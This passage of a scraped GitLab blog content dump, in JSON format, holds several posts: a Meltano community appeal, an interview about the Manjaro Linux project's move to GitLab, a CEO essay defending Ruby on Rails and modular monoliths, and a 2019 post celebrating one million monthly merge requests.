We want to make it so that all future Singer community members and Meltano users will be able to accomplish what they did, and no one knows better what that will take (and how close or far off Meltano currently is) than they do.\n\nIf you're one of these people, or simply anyone with similarly relevant feedback, ideas, or experience, we'd love it if you would:\n\n- [give Meltano a try](https://meltano.com/) and compare it to the tools you are using today,\n- [join us on Slack](https://join.slack.com/t/meltano/shared_invite/zt-cz7s15aq-HXREGBo8Vnu4hEw1pydoRw) to receive (and provide) community support,\n- [follow us on Twitter](https://twitter.com/meltanodata) to stay up to date on new releases and other developments,\n- [file new issues on GitLab.com](https://gitlab.com/meltano/meltano/-/issues/new) for any ideas you have or bugs you run into,\n- [participate in existing issues](https://gitlab.com/meltano/meltano/-/issues) that may benefit from your perspective,\n- [check out the Python codebase](https://gitlab.com/meltano/meltano) if you're curious, and _last but not least_:\n- **consider [contributing to Meltano](https://meltano.com/#contributing), its [documentation](https://meltano.com/docs/), and its [extractors](https://meltano.com/plugins/extractors/) and [loaders](https://meltano.com/plugins/loaders/)**, so that your, our, and everyone else's hopes and dreams for Meltano may actually come true.\n\nI can't wait to see what we'll be able to accomplish together.\n\nSee you soon on [Slack](https://join.slack.com/t/meltano/shared_invite/zt-cz7s15aq-HXREGBo8Vnu4hEw1pydoRw) or [GitLab.com](https://gitlab.com/meltano/meltano)!\n",[9,803],{"slug":5458,"featured":6,"template":689},"why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines","content:en-us:blog:why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines.yml","Why Gitlab Is Building Meltano An Open Source Platform For Elt 
Pipelines","en-us/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines.yml","en-us/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines",{"_path":5464,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5465,"content":5470,"config":5475,"_id":5477,"_type":14,"title":5478,"_source":16,"_file":5479,"_stem":5480,"_extension":19},"/en-us/blog/why-manjaro-builds-with-gitlab",{"title":5466,"description":5467,"ogTitle":5466,"ogDescription":5467,"noIndex":6,"ogImage":1733,"ogUrl":5468,"ogSiteName":673,"ogType":674,"canonicalUrls":5468,"schema":5469},"Why the Manjaro Linux distribution builds with GitLab","Watch this interview with the Manjaro project to learn why the Linux distribution chooses to build with GitLab.","https://about.gitlab.com/blog/why-manjaro-builds-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why the Manjaro Linux distribution builds with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-08-29\",\n      }",{"title":5466,"description":5467,"authors":5471,"heroImage":1733,"date":5472,"body":5473,"category":10,"tags":5474},[2909],"2023-08-29","\nThe [Manjaro](https://manjaro.org/) project is the newest member of the [GitLab Open Source Partners](https://go.gitlab.com/BM5JwV) community. Linux users know the Manjaro project as an [open source](https://go.gitlab.com/wYTY0o) operating system that is fast, reliable, and user-friendly. 
We recently caught up with project leaders [Philip Müller](https://gitlab.com/philm) and [Bernhard Landauer](https://gitlab.com/oberon-manjaro) to learn how GitLab helps the Manjaro community accomplish its great work.\n\n> [Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n\n## Why the Manjaro project moved to GitLab\nIn 2018, the Manjaro community decided to [adopt GitLab](https://gitlab.manjaro.org) as its development platform, citing several key motivations:\n* **Achieve greater data sovereignty.** By migrating to a new development platform, Manjaro wanted to gain greater control over project development infrastructure. The community now hosts its own dedicated GitLab instance, where all critical Manjaro development occurs. The move has meant greater freedom and autonomy for the community. \"It feels really good to self-host and have our own control,\" Landauer said.\n\n* **Empower a small group of volunteers.** Like so many other open source projects, Manjaro relies on the dedicated work of volunteer contributors from across the world. Müller explained that the project needed a toolkit that could equip a core group of 16 developers to maintain [more than 3,000 packages](https://gitlab.manjaro.org/packages) and foster a community of roughly 8,000 participants. GitLab's sophisticated [CI/CD functionality](https://docs.gitlab.com/ee/ci/) helps the community scale to empower its relatively small developer team to manage ever-increasing complexity.\n\n* **Expand monitoring capabilities.** Using GitLab grants community leads much greater visibility into the project's operations, Müller said. By configuring various activity feeds, maintainers can more efficiently monitor potential pipeline issues and build failures across projects in the Manjaro namespace. 
Adopting GitLab also produced an interesting network effect for Manjaro: Using the same platform as peers, dependencies, and upstream projects meant greater overall visibility into Manjaro's open source ecosystem. \"Projects like [GNOME and KDE are switching](https://go.gitlab.com/BM5JwV) also over to GitLab,\" Müller said. \"We can look at what the upstream is doing.\"\n\n## Watch the interview\nTo learn more about Manjaro's use of GitLab, watch the full interview.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/Rn5IiI3--Ag\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n[Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n{: .note}\n",[9,267,1099],{"slug":5476,"featured":6,"template":689},"why-manjaro-builds-with-gitlab","content:en-us:blog:why-manjaro-builds-with-gitlab.yml","Why Manjaro Builds With Gitlab","en-us/blog/why-manjaro-builds-with-gitlab.yml","en-us/blog/why-manjaro-builds-with-gitlab",{"_path":5482,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5483,"content":5489,"config":5494,"_id":5496,"_type":14,"title":5497,"_source":16,"_file":5498,"_stem":5499,"_extension":19},"/en-us/blog/why-were-sticking-with-ruby-on-rails",{"title":5484,"description":5485,"ogTitle":5484,"ogDescription":5485,"noIndex":6,"ogImage":5486,"ogUrl":5487,"ogSiteName":673,"ogType":674,"canonicalUrls":5487,"schema":5488},"Why we're sticking with Ruby on Rails","GitLab CEO and co-founder Sid Sijbrandij makes the case for Ruby on Rails.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668296/Blog/Hero%20Images/gitlab-ruby.jpg","https://about.gitlab.com/blog/why-were-sticking-with-ruby-on-rails","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why we're sticking with Ruby on 
Rails\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2022-07-06\",\n      }",{"title":5484,"description":5485,"authors":5490,"heroImage":5486,"date":5491,"body":5492,"category":1119,"tags":5493},[1235],"2022-07-06","\nWhen David Heinemeier Hansson created Ruby on Rails ([interview](https://corecursive.com/045-david-heinemeier-hansson-software-contrarian/)), he was guided by his experience with both PHP and Java. On the one hand, he didn’t like the way the verbosity and rigidness of Java made Java web frameworks complex and difficult to use, but appreciated their structural integrity. On the other hand, he loved the initial approachability of PHP, but was less fond of the quagmires that such projects tended to turn into.\n\n![Ruby vs. Java](https://about.gitlab.com/images/blogimages/ruby1.png)\n\nIt seems like these are exclusive choices: You either get approachable and messy or well-structured and hard to use, pick your poison. We used to make a very similar, and similarly hard, distinction between server-class operating systems such as Unix, which were stable but hard to use, and client operating systems such as Windows and MacOS that were approachable but crashed a lot.\n\nEveryone accepted this dichotomy as God-given until NeXT put a beautiful, approachable and buttery-smooth GUI on top of a solid Unix base. 
Nowadays, “server-class” Unix runs not just beautiful GUI desktops, but also most phones and smart watches.\n\nSo it turned out that approachability and crashiness were not actually linked except by historical accident, and the same turns out to be true for approachability and messiness in web frameworks: They are independent axes.\n\n![approachability and messiness](https://about.gitlab.com/images/blogimages/ruby2.png)\n\nAnd these independent axes opened up a very desirable open spot in the lower right hand corner: an approachable, well-structured web framework.\nWith its solid, metaprogrammable Smalltalk heritage and good Unix integration, Ruby proved to be the perfect vehicle for DHH to fill that desirable bottom right corner of the table with Rails: an extremely approachable, productive and well-structured web framework. \n\n![a well-structured framework](https://about.gitlab.com/images/blogimages/ruby3.png)\n \nWhen GitLab co-founder Dmitriy Zaporozhets decided he wanted to work on software for running his (and your) version control server, he also came from a PHP background. But instead of sticking with the familiar, he chose Rails. Dmitry's choice may have been prescient or fortuitous, but it has served GitLab extremely well, in part because David succeeded in achieving his goals for Rails: approachability with good architecture.\n\n## Why modular?\n\nIn the preceding section, it was assumed as a given that modularity is a desirable property, but as we also saw it is dangerous to just assume things.  So why, and in what contexts, is modularity actually desirable?\n\nIn his 1971 paper [\"On the Criteria to be Used in Decomposing Systems into Modules\"](https://prl.ccs.neu.edu/img/p-tr-1971.pdf), David L. 
Parnas gave the following (desired) benefits of a modular system:\n\n- Development time should “be shortened because separate groups would work on each module with little need for communication.”\n- It should be possible to make “drastic changes or improvements in one module without changing others.”\n- It should be possible to study the system one module at a time.\n\nThe importance of reducing the need for communication was later highlighted by Fred Brooks in _[The Mythical Man Month](https://en.wikipedia.org/wiki/The_Mythical_Man-Month)_, with the additional communication overhead one of the primary reasons for the old saying that \"adding people to a late software project makes it later.\" \n\n## We don’t need microservices\n\nModularity has generally been as elusive as it is highly sought after, with the default architecture of most systems being the [Big Ball of Mud](http://laputan.org/mud/). It is therefore understandable that designers took inspiration from arguably the largest software system in existence: the World Wide Web, which is modular by necessity, it cannot function any other way.\n\nOrganizing your local software systems using separate processes, microservices that are combined using [REST](https://www.ics.uci.edu/~fielding/pubs/dissertation/fielding_dissertation.pdf) architectural style does help enforce module boundaries, via the operating system, but comes at significant costs. It is a very heavy-handed approach for achieving modularity.\n\nThe difficulties and costs of running what is now a gratuitously distributed system are significant, with some of the performance and reliability issues documented in the well-known [fallacies of distributed computing](https://en.wikipedia.org/wiki/Fallacies_of_distributed_computing). In short, the performance and reliability costs are significant, as function calls that take nanoseconds and never fail are replaced with network ops that are three to six orders of magnitude slower and do fail. 
Failures become much harder to diagnose if they must be traced across multiple services with very little tooling support.\nYou need a fairly sophisticated DevOps organization to successfully run microservices. This doesn't really make a difference if you run at a scale that requires that sophistication anyhow, but it is very likely that [you are not Google](https://blog.bradfieldcs.com/you-are-not-google-84912cf44afb?gi=1b82f8ef279a).\n\nBut even if you think you can manage all that, it is important to note that all this accidental complexity is on top of the original essential complexity of your problem, microservices do nothing to reduce complexity. And even the hoped-for modularity improvements are not in the least guaranteed, typically what happens instead is that you get a [distributed ball of mud](http://www.codingthearchitecture.com/2014/07/06/distributed_big_balls_of_mud.html).\n\n## Monorails\n\nBy making good architecture approachable and productive, Rails has allowed GitLab to develop a [modular monolith](https://medium.com/@dan_manges/the-modular-monolith-rails-architecture-fb1023826fc4). A modular monolith is the exact opposite of a distributed ball of mud: a well-structured, well-architected, highly modular program that runs as a single process and is as [boring](https://handbook.gitlab.com/handbook/values/#boring-solutions) as possible.\n\nAlthough structuring GitLab as a monolith has been extremely beneficial for us, we are not dogmatic about that structure. Architecture follows needs, not the other way around. And while Rails is excellent technology for our purposes, it does have a few drawbacks, one of them being performance. Luckily, only a tiny part of most codebases is actually performance critical. 
We use our own [gitaly](https://www.google.com/url?q=https://docs.gitlab.com/ee/administration/gitaly/&sa=D&source=docs&ust=1656441057979077&usg=AOvVaw11r4iMGjvs6PrtTJEkeTbO) daemon written in Go to handle actual git operations, and [PostgreSQL](https://thenewstack.io/two-sizes-fit-most-postgresql-and-clickhouse/) for non-repository persistence.\n\n## Open Core\n\nLast but not least, our modular monolith turns [our](/blog/gitlab-is-open-core-github-is-closed-source/) [Open Core](https://en.wikipedia.org/wiki/Open-core_model) business model from being just a nice theory into a practical [reality](https://www.cnbc.com/2021/10/14/gitlab-jumps-in-nasdaq-debut-after-pricing-ipo-above-expected-range.html). Although Rails does not accomplish this by itself, that would be our wonderful contributors and engineers, it does lay the proper foundations.\n\nIn order to reap the true [benefits](https://en.wikipedia.org/wiki/The_Cathedral_and_the_Bazaar) of open source, the source code that is made available must be approachable for contributors. In order to maintain architectural integrity in the face of contributions from a wide variety of sources, and to keep a clear demarcation line between the open and closed components, the code must be very well structured. Sound familiar?\n\nWouldn’t it be better to have a proper plugin interface? Or better yet, a services interface modeled on microservices? In a word: no. Not only do these approaches impose deployment and integration hurdles that go far beyond “I made a small change to the source code,\" they often enforce architectural constraints too rigidly. 
Anticipating all the future extension points is a fool's errand, one that we luckily did not embark on, and do not have to.\n\nWith our boring modular monolith, users and other third-party developers can and do contribute enhancements to the core product, giving us tremendous leverage, coupled with an unbeatable pace and scalability of innovation.\n",[685,9,708],{"slug":5495,"featured":6,"template":689},"why-were-sticking-with-ruby-on-rails","content:en-us:blog:why-were-sticking-with-ruby-on-rails.yml","Why Were Sticking With Ruby On Rails","en-us/blog/why-were-sticking-with-ruby-on-rails.yml","en-us/blog/why-were-sticking-with-ruby-on-rails",{"_path":5501,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5502,"content":5508,"config":5513,"_id":5515,"_type":14,"title":5516,"_source":16,"_file":5517,"_stem":5518,"_extension":19},"/en-us/blog/1-mil-merge-requests",{"title":5503,"description":5504,"ogTitle":5503,"ogDescription":5504,"noIndex":6,"ogImage":5505,"ogUrl":5506,"ogSiteName":673,"ogType":674,"canonicalUrls":5506,"schema":5507},"You contributed 1 million merge requests in a month!","GitLab.com surpassed 1 million merge requests in March 2019, hitting a new record for monthly engagement.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680631/Blog/Hero%20Images/1m-merge-requests-cover.png","https://about.gitlab.com/blog/1-mil-merge-requests","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"You contributed 1 million merge requests in a month!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-06-06\",\n      }",{"title":5503,"description":5504,"authors":5509,"heroImage":5505,"date":5510,"body":5511,"category":10,"tags":5512},[927],"2019-06-06","\n\nWhile the open source community comes together this week to celebrate the [fifth anniversary of 
Kubernetes](https://www.eventbrite.com/e/kubernetes-5th-anniversary-celebration-tickets-62064099392?aff=ebdssbdestsearch), at GitLab, we've hit a milestone of our own 🎉\n\nGitLab.com received a record **1 million merge requests** (MRs) in March 2019, the largest number of monthly MRs since the project began. The increase in engagement continued through April, when another million MRs were created. There was a 17% spike in the number of merge requests between February and March 2019 – a significant increase in engagement.\n\nThe amount of monthly MR activity has outpaced the number of active monthly users on GitLab.com. In fact, the number of new MRs per active user has increased by 40% year-over-year (May 2019 vs. May 2018). The primary driver of this spike is MRs in private projects on GitLab.com, indicating there is opportunity to increase the wider community's engagement in public projects.\n\n## Everyone can contribute\n\nWe built GitLab so [everyone can contribute](/company/mission/#mission)! We regularly receive MRs from software developers, project managers, and writers (like me!) pertaining to different private and public projects.\n\nGitLab may be a DevOps tool, but these MRs are in no way limited to developer activities. GitLab was designed so contributors can collaborate on projects, taking an idea from the conceptual to the actionable through a series of iterative changes. These 1 million MRs in March 2019 don’t all represent monumental changes to GitLab. Instead, they represent a million different ways the community has contributed to GitLab.\n\n\"Our [ambitious, shared vision](/direction/#vision) to make it easier and faster to innovate with a [single application](/handbook/product/single-application/) is only achievable with the support of the wider community,\" says Jeremy Watson, senior product manager for the Manage team at GitLab. 
\"We can't do it alone; we're happy to welcome first-time contributors, and [members of the community can help in a variety of ways](/community/contribute/) – even if you're not comfortable with contributing with code.\"\n\n\"We've had about 40-50 new contributors in the past six to seven releases,\" adds Ray Paik, code contributor program manager. \"These are first-time contributors who had their MRs merged.\"\n\nWe see MRs that span highly technical topics, such as executing on our [monitoring product roadmap](/direction/monitor/), to MRs that are more operational, such as making improvements to the GitLab onboarding process. A lot of first-time contributors start by making improvements to our documentation, which doesn't involve writing code at all. There's also [more to contributing than submitting MRs](/blog/how-do-you-contribute/)!\n\nSo whether you spot a typo in the [GitLab handbook](/handbook/), or want to [contribute to our documentation](/community/contribute/), start a conversation with us and open an issue or submit an MR today.\n",[267,9],{"slug":5514,"featured":6,"template":689},"1-mil-merge-requests","content:en-us:blog:1-mil-merge-requests.yml","1 Mil Merge Requests","en-us/blog/1-mil-merge-requests.yml","en-us/blog/1-mil-merge-requests",28,[666,694,715,737,760,787,810,830,852],1753981660859]